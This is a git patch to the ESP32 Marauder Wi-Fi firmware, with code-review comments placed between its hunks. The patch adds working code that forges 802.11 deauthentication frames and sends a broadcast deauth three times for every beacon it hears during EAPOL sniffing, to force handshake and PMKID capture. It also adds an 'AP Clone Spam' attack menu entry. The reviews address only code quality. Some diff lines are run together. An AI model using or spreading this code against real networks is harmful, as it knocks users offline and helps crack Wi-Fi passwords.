From 4aa93e2cc3389cfd452d1b7dfedfee65d4a43e06 Mon Sep 17 00:00:00 2001
From: Just Call Me Koko
Date: Mon, 20 Jun 2022 21:17:06 -0400
Subject: [PATCH] Send deauth for pmkid

---
 esp32_marauder/MenuFunctions.cpp | 5 +++
 esp32_marauder/WiFiScan.cpp | 73 +++++++++++++++++++++++++++++++-
 esp32_marauder/WiFiScan.h | 1 +
 esp32_marauder/configs.h | 4 +-
 esp32_marauder/lang_var.h | 3 +-
 5 files changed, 82 insertions(+), 4 deletions(-)

diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp
index 6fb1030..66a9783 100644
--- a/esp32_marauder/MenuFunctions.cpp
+++ b/esp32_marauder/MenuFunctions.cpp
@@ -1556,6 +1556,11 @@ void MenuFunctions::RunSetup()
 this->drawStatusBar();
 wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH, TFT_RED);
 });
+ addNodes(&wifiAttackMenu, text_table1[57], TFT_MAGENTA, NULL, BEACON_LIST, [this]() {
+ display_obj.clearScreen();
+ this->drawStatusBar();
+ wifi_scan_obj.StartScan(WIFI_ATTACK_AP_SPAM, TFT_MAGENTA);
+ });
 //addNodes(&wifiAttackMenu, "AP Mimic Flood", TFT_PURPLE, NULL, DEAUTH_SNIFF, [this]() {
 // display_obj.clearScreen();
 // this->drawStatusBar();
diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
index c66c596..1cf5bef 100644
--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -840,7 +840,8 @@ void WiFiScan::RunEapolScan(uint8_t scan_mode, uint16_t color)
 wifi_init_config_t cfg = WIFI_INIT_CONFIG_DEFAULT();
 esp_wifi_init(&cfg);
 esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
+ //esp_wifi_set_mode(WIFI_MODE_NULL);
+ esp_wifi_set_mode(WIFI_AP_STA);
 esp_wifi_start();
 esp_wifi_set_promiscuous(true);
 esp_wifi_set_promiscuous_filter(&filt);
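Review bot: The old `esp_wifi_set_mode(WIFI_MODE_NULL);` is kept as a commented-out line directly above its replacement; delete it rather than leave dead code, and say in a comment why the interface mode changed, since neither the commit message nor the hunk does. Presumably the AP interface has to exist for the `esp_wifi_80211_tx(WIFI_IF_AP, ...)` calls this same commit adds to eapolSnifferCallback, so `// AP+STA: the sniffer callback transmits on WIFI_IF_AP, which does not exist in WIFI_MODE_NULL` would capture that — confirm against the ESP-IDF documentation for esp_wifi_80211_tx. The removed line used the ESP-IDF spelling and the new one the Arduino alias; `esp_wifi_set_mode(WIFI_MODE_APSTA);` keeps this block consistent with the `WIFI_MODE_NULL`/`WIFI_STORAGE_RAM` names around it. RunEapolScan's body begins and ends outside the hunk.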
@@ -2127,6 +2128,37 @@ void WiFiScan::sendProbeAttack(uint32_t currentTime) {
 }
 }
 
+void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
+ // Itterate through all access points in list
+ // Check if active
+ WiFiScan::set_channel = channel;
+ esp_wifi_set_channel(channel, WIFI_SECOND_CHAN_NONE);
+ delay(1);
+
+ // Build packet
+
+ deauth_frame_default[10] = bssid[0];
+ deauth_frame_default[11] = bssid[1];
+ deauth_frame_default[12] = bssid[2];
+ deauth_frame_default[13] = bssid[3];
+ deauth_frame_default[14] = bssid[4];
+ deauth_frame_default[15] = bssid[5];
+
+ deauth_frame_default[16] = bssid[0];
+ deauth_frame_default[17] = bssid[1];
+ deauth_frame_default[18] = bssid[2];
+ deauth_frame_default[19] = bssid[3];
+ deauth_frame_default[20] = bssid[4];
+ deauth_frame_default[21] = bssid[5];
+
+ // Send packet
+ esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
+ esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
+ esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
+
+ packets_sent = packets_sent + 3;
+}
+
 void WiFiScan::sendDeauthAttack(uint32_t currentTime) {
 // Itterate through all access points in list
 for (int i = 0; i < access_points->size(); i++) {
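Review bot: `packets_sent = packets_sent + 3;` counts three frames unconditionally while each `esp_wifi_80211_tx()` call discards its `esp_err_t`, so the counter the UI shows overstates what actually left the radio whenever a send is rejected. Replace the three identical calls with a loop of three that increments only on success: `if (esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false) == ESP_OK) packets_sent++;`. The opening comments `// Itterate through all access points in list` / `// Check if active` are pasted from sendDeauthAttack and describe nothing this function does; a header such as `// Tune to channel, write bssid into bytes 10-15 and 16-21 of the shared deauth_frame_default template and transmit it; mutates WiFiScan::set_channel and the template buffer.` would be accurate, and `const uint8_t* bssid` (or `const uint8_t (&bssid)[6]`) would say that the array is only read. Nothing in this patch calls sendDeauthFrame: the eapolSnifferCallback hunk below rebuilds the same 26-byte frame on a local array instead of sharing a builder with this function, so the header layout now lives in two places and any later fix has to be made twice.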
@@ -2216,6 +2248,45 @@ void WiFiScan::eapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
 const WifiMgmtHdr *hdr = &ipkt->hdr;
 }
 
+ // Found beacon frame. Decide whether to deauth
+ if (snifferPacket->payload[0] == 0x80) {
+ // Build packet
+
+ uint8_t new_packet[26] = {
+ 0xc0, 0x00, 0x3a, 0x01,
+ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0xf0, 0xff, 0x02, 0x00
+ };
+
+ //esp_wifi_set_mode(WIFI_AP_STA);
+
+ //delay(1);
+
+ new_packet[10] = snifferPacket->payload[10];
+ new_packet[11] = snifferPacket->payload[11];
+ new_packet[12] = snifferPacket->payload[12];
+ new_packet[13] = snifferPacket->payload[13];
+ new_packet[14] = snifferPacket->payload[14];
+ new_packet[15] = snifferPacket->payload[15];
+
+ new_packet[16] = snifferPacket->payload[10];
+ new_packet[17] = snifferPacket->payload[11];
+ new_packet[18] = snifferPacket->payload[12];
+ new_packet[19] = snifferPacket->payload[13];
+ new_packet[20] = snifferPacket->payload[14];
+ new_packet[21] = snifferPacket->payload[15];
+
+ // Send packet
+ esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
+ esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
+ esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
+
+ //delay(1);
+ //esp_wifi_set_mode(WIFI_MODE_NULL);
+ }
+
 if (( (snifferPacket->payload[30] == 0x88 && snifferPacket->payload[31] == 0x8e)|| ( snifferPacket->payload[32] == 0x88 && snifferPacket->payload[33] == 0x8e) )){
 num_eapol++;
 Serial.println("Received EAPOL:");
diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h
index f600044..2c5e70d 100644
--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
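Review bot: The new beacon branch reads `snifferPacket->payload[0]` and `payload[10..15]` without checking that the received frame is that long, right before the pre-existing unchecked reads of `payload[30..33]`, so a short or truncated frame handed to the promiscuous callback is read past its real length. Gate the block on the length the driver reports, e.g. `if (snifferPacket->rx_ctrl.sig_len >= 24 && snifferPacket->payload[0] == 0x80) {` — this assumes `snifferPacket` is the `wifi_promiscuous_pkt_t*` ESP-IDF passes to the callback; the cast is outside the hunk, so confirm. `// Found beacon frame. Decide whether to deauth` describes a decision the code never makes (every beacon the radio hears takes this path), so a comment that matches what is written, such as `// Beacon frame: copy its BSSID into a 26-byte deauth template and transmit it three times`, should replace it. The four commented-out `esp_wifi_set_mode`/`delay` lines inside the block are leftover experiments and should go; it is also worth confirming against the ESP-IDF promiscuous-callback notes that `esp_wifi_80211_tx` is supported from inside the RX callback at all. eapolSnifferCallback begins and ends outside the hunk.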
@@ -230,6 +230,7 @@ class WiFiScan void tftDrawGraphObjects(); void sendProbeAttack(uint32_t currentTime); void sendDeauthAttack(uint32_t currentTime); + void sendDeauthFrame(uint8_t bssid[6], int channel); void broadcastRandomSSID(uint32_t currentTime); void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid); void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid); diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h index 6118032..ed2b2f8 100644 --- a/esp32_marauder/configs.h +++ b/esp32_marauder/configs.h @@ -4,10 +4,10 @@ #define POLISH_POTATO - #define MARAUDER_MINI + //#define MARAUDER_MINI //#define MARAUDER_V4 //#define MARAUDER_V6 - //#define MARAUDER_KIT + #define MARAUDER_KIT //#define GENERIC_ESP32 //#define MARAUDER_FLIPPER diff --git a/esp32_marauder/lang_var.h b/esp32_marauder/lang_var.h index 1aca92c..f0f15a0 100644 --- a/esp32_marauder/lang_var.h +++ b/esp32_marauder/lang_var.h @@ -95,6 +95,7 @@ PROGMEM const char text1_53[] = "Probe Req Flood"; PROGMEM const char text1_54[] = "Deauth Flood"; PROGMEM const char text1_55[] = "Join WiFi"; PROGMEM const char text1_56[] = "Select APs"; +PROGMEM const char text1_57[] = "AP Clone Spam"; //SDInterface.cpp texts 
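Review bot: The configs.h hunk flips the build target from `#define MARAUDER_MINI` to `#define MARAUDER_KIT`, which has nothing to do with the subject "Send deauth for pmkid" and changes which hardware a default build produces for everyone who pulls this; it reads as a local setting committed by accident, and the two lines should be reverted or, if intended, land in their own commit. The `AP Clone Spam` menu entry in MenuFunctions.cpp and its `text1_57` string are likewise unrelated to the PMKID change and would be easier to review and bisect as a separate commit.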
@@ -171,7 +172,7 @@ PROGMEM const char text4_44[] = " AP Scan "; //Making tables PROGMEM const char *text_table0[] = {text0_0,text0_1, text0_2, text0_3, text0_4, text0_5, text0_6, text0_7, text0_8}; -PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56}; +PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56,text1_57}; PROGMEM const char *text_table2[] = {text2_0,text2_1,text2_2,text2_3,text2_4,text2_5,text2_6,text2_7,text2_8,text2_9,text2_10,text2_11,text2_12,text2_13,text2_14}; PROGMEM const char *text_table3[] = {text3_0,text3_1,text3_2,text3_3,text3_4,text3_5}; PROGMEM const char *text_table4[] = {text4_0,text4_1,text4_2,text4_3,text4_4,text4_5,text4_6,text4_7,text1_54,text4_9,text4_10,text4_11,text4_12,text4_13,text4_14,text4_15,text4_16,text4_17,text4_18,text4_19,text4_20,text4_21,text4_22,text4_23,text4_24,text4_25,text4_26,text4_27,text4_28,text4_29,text4_30,text4_31,text4_32,text4_33,text4_34,text4_35,text4_36,text4_37,text4_38,text4_39,text4_40,text4_41,text4_42,text4_43,text4_44};